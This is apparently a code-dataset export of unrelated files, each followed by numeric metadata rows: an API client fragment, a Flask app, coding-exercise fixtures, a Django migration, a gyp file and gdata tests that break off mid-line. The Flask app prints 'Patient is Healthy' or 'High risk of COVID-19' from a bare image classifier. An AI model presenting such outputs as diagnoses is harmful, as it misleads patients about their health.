_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Account]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.list_accounts_endpoint.call_with_http_info(**kwargs)
def list_institution_accounts(
self,
id,
**kwargs
):
"""List accounts in institution # noqa: E501
Lists accounts belonging to an institution by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_institution_accounts(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the institution.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Account]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.list_institution_accounts_endpoint.call_with_http_info(**kwargs)
def update_account(
self,
id,
**kwargs
):
"""Update account # noqa: E501
Updates and returns an account by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
inline_object (InlineObject): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.update_account_endpoint.call_with_http_info(**kwargs)
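# Illustrative sketch, not part of the generated module: minimal usage of the
# AccountsApi defined above. ApiClient comes from the module's own package; the
# Configuration class and its api_key dict are assumed to exist as they normally do
# in OpenAPI Generator Python clients, and the developer key and user id are
# placeholders.
from pocketsmith.api_client import ApiClient
from pocketsmith.configuration import Configuration   # assumed generator layout
from pocketsmith.api.accounts_api import AccountsApi

configuration = Configuration()
configuration.api_key['developerKey'] = 'YOUR_DEVELOPER_KEY'   # auth scheme named in the settings above

api = AccountsApi(ApiClient(configuration))
for account in api.list_accounts(42):      # returns [Account] for user id 42
    print(account)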
| 33.669302
| 113
| 0.477441
| 2,309
| 25,555
| 5.060632
| 0.086185
| 0.033119
| 0.026701
| 0.027728
| 0.873941
| 0.867351
| 0.863671
| 0.84938
| 0.827214
| 0.820539
| 0
| 0.00562
| 0.436001
| 25,555
| 758
| 114
| 33.71372
| 0.805107
| 0.361808
| 0
| 0.664671
| 1
| 0
| 0.211287
| 0.030125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013972
| false
| 0
| 0.015968
| 0
| 0.043912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c04a30b7ca09d730f69f38c3a803271d7087704
| 5,093
|
py
|
Python
|
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
from flask import Flask
app = Flask(__name__,static_folder="myCSS") #,template_folder="/content/COVID-Brain-Tumour-Project/project folder")
import numpy as np
from keras.preprocessing import image
from keras.models import load_model
from flask import redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
import os
import sys
import shutil
from flask_cors import CORS, cross_origin
import tensorflow as tf
from uuid import uuid4
cors = CORS(app, resources={r"/*": {"origins": "*"}})
y=[]
@app.route('/', methods=['GET', 'POST'])
#@cross_origin()
def index():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Covid_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of COVID-19'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('/covidPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/covidPage.html',resultt=prediction)
@app.route('/covidPage.html', methods=['GET', 'POST'])
#@cross_origin()
def predict():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Covid_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of COVID-19'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('/covidPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/covidPage.html',resultt=prediction)
@app.route('/brainTumourPage.html', methods=['GET', 'POST'])
#@cross_origin()
def predict2():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Brain_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of brainTumour'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('brainTumourPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/brainTumourPage.html',resultt=prediction)
if __name__=="__main__":
#http_server = WSGIServer(('',8080),app)
#http_server.serve_forever()
app.run()
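# Illustrative sketch, not part of app.py: each route above reads
# request.files['file'], so a client only needs a multipart upload. Assumes the app
# is running on Flask's default http://127.0.0.1:5000, uses the requests library,
# and 'chest_xray.png' is a placeholder filename. Note that the three routes
# duplicate the same logic and reload the Keras model on every request; loading the
# models once at startup would avoid that cost.
import requests

with open('chest_xray.png', 'rb') as fh:
    resp = requests.post(
        'http://127.0.0.1:5000/covidPage.html',
        files={'file': fh},               # field name must match request.files['file']
    )
print(resp.status_code)
print(resp.text[:200])                    # start of the rendered covidPage.html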
| 34.181208
| 115
| 0.648145
| 648
| 5,093
| 4.919753
| 0.203704
| 0.059285
| 0.028231
| 0.043287
| 0.814931
| 0.814931
| 0.806148
| 0.770075
| 0.770075
| 0.770075
| 0
| 0.024413
| 0.171608
| 5,093
| 148
| 116
| 34.412162
| 0.731216
| 0.223444
| 0
| 0.740741
| 0
| 0
| 0.207196
| 0.064302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.12037
| 0
| 0.203704
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c10a86aa04f246c279bbc075ad6ac069c435605
| 904
|
py
|
Python
|
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
from random import randint, shuffle
class TestDataEmptyArray(object):
@staticmethod
def get_array():
# complete this function
return []
class TestDataUniqueValues(object):
@staticmethod
def get_array():
# complete this function
arr = [14,76,34,5,37,7,64,6,25,41,4,3,56,35,2]
return arr
@staticmethod
def get_expected_result():
# complete this function
arr = [14,76,34,5,37,7,64,6,25,41,4,3,56,35,2]
return arr.index(min(arr))
class TestDataExactlyTwoDifferentMinimums(object):
@staticmethod
def get_array():
# complete this function
arr = [5,7,2,45,7,2,4,6,2,2,6,7,2,23,4,7,3,7,1,6,1]
return arr
@staticmethod
def get_expected_result():
# complete this function
arr = [5,7,2,45,7,2,4,6,2,2,6,7,2,23,4,7,3,7,1,6,1]
return arr.index(min(arr))
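# Illustrative sketch, not part of the original submission: the classes above only
# provide fixtures, and their expected-result methods return arr.index(min(arr)), so
# the function under test is evidently "index of the minimum element". A minimal
# version of that function plus a quick check against the fixtures (this harness is
# assumed, not taken from the HackerRank template).
def minimum_index(seq):
    if len(seq) == 0:
        raise ValueError("Cannot get the minimum value index from an empty sequence")
    return seq.index(min(seq))

for case in (TestDataUniqueValues, TestDataExactlyTwoDifferentMinimums):
    assert minimum_index(case.get_array()) == case.get_expected_result()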
| 21.52381
| 59
| 0.597345
| 141
| 904
| 3.780142
| 0.29078
| 0.022514
| 0.168856
| 0.172608
| 0.767355
| 0.726079
| 0.726079
| 0.726079
| 0.536585
| 0.536585
| 0
| 0.14093
| 0.262168
| 904
| 41
| 60
| 22.04878
| 0.658171
| 0.126106
| 0
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.043478
| 0.043478
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9c2616d643410adc4da0cac6a83a91394eee4dd6
| 86
|
py
|
Python
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
import struct
def pack(f, *args):
return struct.pack(f, *args)
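# Illustrative example, not part of pack.py: the wrapper forwards straight to
# struct.pack, so it accepts standard struct format strings. For instance, an
# unsigned 32-bit little-endian integer followed by two raw bytes:
data = pack('<I2s', 1024, b'ok')
print(data)    # b'\x00\x04\x00\x00ok'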
| 10.75
| 32
| 0.639535
| 14
| 86
| 3.928571
| 0.714286
| 0.181818
| 0.327273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.209302
| 86
| 7
| 33
| 12.285714
| 0.794118
| 0.151163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9c7ed9dbf37d0a827a645cb7f6712ca63ead9e73
| 1,948
|
py
|
Python
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 53
|
2015-01-10T17:39:19.000Z
|
2019-06-12T17:36:34.000Z
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 1,176
|
2015-01-02T06:32:47.000Z
|
2019-06-18T11:57:47.000Z
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 44
|
2015-01-03T15:08:56.000Z
|
2019-06-09T05:33:08.000Z
|
# Generated by Django 2.2.17 on 2021-02-28 09:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workshops', '0233_membership_extended'),
]
operations = [
migrations.AddField(
model_name='membership',
name='instructor_training_seats_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Instructor training seats rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='instructor_training_seats_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Instructor training seats rolled over into next membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='self_organized_workshops_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Self-organized workshops rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='self_organized_workshops_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Self-organized workshops rolled over into next membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='workshops_without_admin_fee_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Workshops without admin fee rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='workshops_without_admin_fee_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Workshops without admin fee rolled over into next membership.', null=True),
),
]
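# Illustrative sketch, not part of the migration: for orientation only, the AddField
# operations above correspond to model fields of roughly this shape on the Membership
# model (amy/workshops/models.py in the real project; this excerpt is inferred from
# the migration, not copied from that file).
from django.db import models

class Membership(models.Model):
    instructor_training_seats_rolled_from_previous = models.PositiveIntegerField(
        blank=True, null=True,
        help_text='Instructor training seats rolled over from previous membership.',
    )
    instructor_training_seats_rolled_over = models.PositiveIntegerField(
        blank=True, null=True,
        help_text='Instructor training seats rolled over into next membership.',
    )
    # ...the four remaining *_rolled_from_previous / *_rolled_over fields follow the
    # same PositiveIntegerField(blank=True, null=True, help_text=...) pattern.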
| 44.272727
| 148
| 0.677618
| 203
| 1,948
| 6.29064
| 0.231527
| 0.070478
| 0.108066
| 0.12686
| 0.878622
| 0.878622
| 0.878622
| 0.858262
| 0.858262
| 0.848865
| 0
| 0.013351
| 0.231006
| 1,948
| 43
| 149
| 45.302326
| 0.839119
| 0.023614
| 0
| 0.486486
| 1
| 0
| 0.374737
| 0.144737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
130b8996b43138f502e3d5ede9209e0f6d8d743b
| 3,860
|
gyp
|
Python
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
google-ar/chromium
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 777
|
2017-08-29T15:15:32.000Z
|
2022-03-21T05:29:41.000Z
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 66
|
2017-08-30T18:31:18.000Z
|
2021-08-02T10:59:35.000Z
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 123
|
2017-08-30T01:19:34.000Z
|
2022-03-17T22:55:31.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'alert_overlay',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'array_data_model',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:event_target',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'command',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:ui',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'drag_wrapper',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_grid',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'focus_row',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_manager',
'dependencies': ['../../compiled_resources2.gyp:cr'],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_outline_manager',
'dependencies': ['../../compiled_resources2.gyp:cr'],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_row',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu_button',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'../compiled_resources2.gyp:ui',
'menu',
'menu_item',
'position_util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu_item',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:load_time_data',
'../compiled_resources2.gyp:ui',
'command',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:ui',
'menu_item',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'overlay',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'position_util',
'dependencies': [
'../../compiled_resources2.gyp:cr',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
],
}
| 32.711864
| 86
| 0.538342
| 333
| 3,860
| 5.927928
| 0.198198
| 0.273556
| 0.319149
| 0.217325
| 0.852584
| 0.847518
| 0.847518
| 0.847518
| 0.757852
| 0.738095
| 0
| 0.015688
| 0.223834
| 3,860
| 117
| 87
| 32.991453
| 0.643191
| 0.040155
| 0
| 0.578947
| 0
| 0
| 0.662253
| 0.504188
| 0
| 0
| 0
| 0
| 0.04386
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
135657bbe6eec6d4bedbfca48914a301e2f5cc68
| 219
|
py
|
Python
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 1
|
2021-03-14T08:20:51.000Z
|
2021-03-14T08:20:51.000Z
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 1
|
2021-11-29T09:56:18.000Z
|
2021-12-01T22:01:13.000Z
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 2
|
2021-08-30T08:14:34.000Z
|
2021-09-28T15:10:23.000Z
|
from test.handler.excel.excelTransformationTest import ExcelTransformationNonStrictValidationTest
from test.handler.excel.excelTransformationsForStrictValidationTest import ExcelTransformationsForStrictValidationTest
| 73
| 119
| 0.926941
| 14
| 219
| 14.5
| 0.571429
| 0.078818
| 0.147783
| 0.197044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045662
| 219
| 2
| 120
| 109.5
| 0.971292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1363b1cabbea6f05640d9cd39030f98cb8c06aa4
| 8,104
|
py
|
Python
|
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'api.eric@google.com (Eric Bidelman)'
import getpass
import unittest
from gdata import test_data
import gdata.health
import gdata.health.service
username = ''
password = ''
class HealthQueryProfileListTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
def testGetProfileListFeed(self):
self.assert_(isinstance(self.profile_list_feed,
gdata.health.ProfileListFeed))
self.assertEqual(self.profile_list_feed.id.text,
'https://www.google.com/health/feeds/profile/list')
first_entry = self.profile_list_feed.entry[0]
self.assert_(isinstance(first_entry, gdata.health.ProfileListEntry))
self.assert_(first_entry.GetProfileId() is not None)
self.assert_(first_entry.GetProfileName() is not None)
query = gdata.health.service.HealthProfileListQuery()
profile_list = self.health.GetProfileListFeed(query)
self.assertEqual(first_entry.GetProfileId(),
profile_list.entry[0].GetProfileId())
self.assertEqual(profile_list.id.text,
'https://www.google.com/health/feeds/profile/list')
class H9QueryProfileListTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
def testGetProfileListFeed(self):
self.assert_(isinstance(self.profile_list_feed,
gdata.health.ProfileListFeed))
self.assertEqual(self.profile_list_feed.id.text,
'https://www.google.com/h9/feeds/profile/list')
first_entry = self.profile_list_feed.entry[0]
self.assert_(isinstance(first_entry, gdata.health.ProfileListEntry))
self.assert_(first_entry.GetProfileId() is not None)
self.assert_(first_entry.GetProfileName() is not None)
query = gdata.health.service.HealthProfileListQuery()
profile_list = self.h9.GetProfileListFeed(query)
self.assertEqual(first_entry.GetProfileId(),
profile_list.entry[0].GetProfileId())
self.assertEqual(profile_list.id.text,
'https://www.google.com/h9/feeds/profile/list')
class HealthQueryProfileTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testGetProfileFeed(self):
feed = self.health.GetProfileFeed(profile_id=self.profile_id)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(isinstance(feed.entry[0].ccr, gdata.health.Ccr))
def testGetProfileFeedByQuery(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id)
feed = self.health.GetProfileFeed(query=query)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
def testGetProfileDigestFeed(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id,
params={'digest': 'true'})
feed = self.health.GetProfileFeed(query=query)
self.assertEqual(len(feed.entry), 1)
def testGetMedicationsAndConditions(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id,
params={'digest': 'true'}, categories=['medication|condition'])
feed = self.health.GetProfileFeed(query=query)
self.assertEqual(len(feed.entry), 1)
if feed.entry[0].ccr.GetMedications() is not None:
